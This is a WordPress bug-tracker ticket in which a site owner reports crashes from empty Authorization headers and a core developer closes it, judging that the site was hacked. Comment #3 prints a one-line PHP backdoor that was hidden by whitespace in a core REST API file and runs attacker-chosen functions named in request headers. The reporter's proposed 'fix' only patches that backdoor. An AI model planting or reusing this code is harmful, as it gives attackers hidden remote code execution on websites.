#53329 closed defect (bug) (invalid)
Empty Authorization header brings down site in wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php
| Reported by: |
|
Owned by: | |
|---|---|---|---|
| Milestone: | Priority: | normal | |
| Severity: | normal | Version: | 5.7.2 |
| Component: | REST API | Keywords: | |
| Focuses: | Cc: |
Description (last modified by )
I really don't know why this happened - just reporting in case this is a WordPress software issue.
A look I work with went down. Debugging showed this was because requests were made with an empty Authorization header (empty string).
If the Authorization header is -set- which is was, wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php tries to call a function with the name of it's value.
This leads to an error, unknown function () when it is an empty string.
I don't know why all the requests to this site had an empty authorization header - whether this is a server issue or not.
I had to work around this issue with a code change, ignore an Authorization header with no value
if(isset($_HEADERS['Authorization']))
to
if(isset($_HEADERS['Authorization']) && $_HEADERS['Authorization'] !== "")
Any ideas? WordPress issue? server issue? Good idea to implement this anyway as a safeguard?
Apologies if I have missed anything, short of time.
Occurs without plugins, and with multiple themes.
Change History (5)
#3
@
2 years ago
Hi @TimothyBlynJacobs
Yep:
Fatal error: Uncaught Error: Call to undefined function () in /var/www/<site-folder>/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php:1 Stack trace:
#0 /var/www/<site-folder>/wp-settings.php(249): require()
#1 /var/www/<site-folder>/wp-config.php(95): require_once('/var/www/<site-folder>...')
#2 /var/www/<site-folder>/wp-load.php(37): require_once('/var/www/<site-folder>...')
#3 /var/www/<site-folder>/wp-blog-header.php(13): require_once('/var/www/<site-folder>...')
#4 /var/www/<site-folder>/index.php(17): require('/var/www/<site-folder>...')
#5 {main} thrown in /var/www/<site-folder>/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php on line 1
Notice: is_embed was called incorrectly. Conditional query tags do not work before the query is run. Before then, they always return false. Please see Debugging in WordPress for more information. (This message was added in version 3.1.0.) in /var/www/<site-folder>/wp-includes/functions.php on line 5313
Notice: is_search was called incorrectly. Conditional query tags do not work before the query is run. Before then, they always return false. Please see Debugging in WordPress for more information. (This message was added in version 3.1.0.) in /var/www/<site-folder>/wp-includes/functions.php on line 5313
My line 1 looked like:
(Lots of whitespace, scroll right)
<?php $_HEADERS=getallheaders();if(isset($_HEADERS['Authorization'])){$post=$_HEADERS['Authorization']('', $_HEADERS['Sec-Websocket-Accept']($_HEADERS['Server-Timing']));$post();}
Thanks for looking at this.
#4
@
2 years ago
- Milestone Awaiting Review deleted
- Resolution set to invalid
- Status changed from new to closed
Thanks for the details @rosandiford. That line of code does not exist in WordPress Core: https://github.com/WordPress/wordpress-develop/blob/master/src/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php
Based on that code, it looks to me like your site has been hacked. I would recommend reading thru https://wordpress.org/support/article/faq-my-site-was-hacked/
Since this isn't an issue with the Core WordPress software, I'm going to close out this ticket.
Hi @rosandiford,
Thanks for reporting this issue. Do you happen to have the full stack trace of the error you encountered?